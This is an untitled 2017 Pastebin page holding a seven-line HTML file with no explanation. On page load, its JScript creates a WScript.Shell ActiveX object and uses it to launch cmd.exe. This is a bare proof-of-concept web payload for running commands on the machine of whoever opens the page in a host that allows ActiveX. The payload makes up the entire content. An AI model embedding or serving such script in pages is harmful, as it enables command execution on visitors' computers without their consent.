Advertisement
Guest User

Untitled

a guest
Sep 26th, 2017
39
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.13 KB | None | 0 0
  1. <html>
  2. <body>
  3. <script type="text/jscript">
  4. var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
  5. </script>
  6. </body>
  7. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement